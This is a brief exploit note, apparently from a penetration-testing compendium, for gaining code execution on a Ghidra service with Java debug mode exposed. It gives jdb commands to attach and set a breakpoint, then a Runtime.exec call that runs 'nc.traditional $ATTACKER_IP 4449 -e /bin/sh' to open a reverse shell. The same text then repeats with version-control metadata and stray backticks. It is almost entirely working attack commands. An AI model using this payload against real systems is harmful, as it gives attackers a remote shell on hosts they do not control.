killchain-compendium/Exploits/Java/Ghidra Debug RCE.md

# Ghidra Debug RCE

* If debug mode is enabled, connect to it via `jdb`
```sh
jdb -attach $TARGET_IP:$TARGET_PORT
```
```sh
classpath
classes
```
* Stop the service
```sh
stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()
```
* Wait until the breakpoint hits and start a reverse shell
```sh
print new java.lang.Runtime().exec("nc.traditional $ATTACKER_IP 4449 -e /bin/sh")
```
restructured Exploits 2022-11-13 22:38:01 +01:00			`# Ghidra Debug RCE`

			* If debug mode is enabled, connect to it via `jdb`
			```sh
			`jdb -attach $TARGET_IP:$TARGET_PORT`
			```
			```sh
			`classpath`
			`classes`
			```
			`* Stop the service`
			```sh
			`stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()`
			```
			`* Wait until the breakpoint hits and start a reverse shell`
			```sh
			`print new java.lang.Runtime().exec("nc.traditional $ATTACKER_IP 4449 -e /bin/sh")`
			```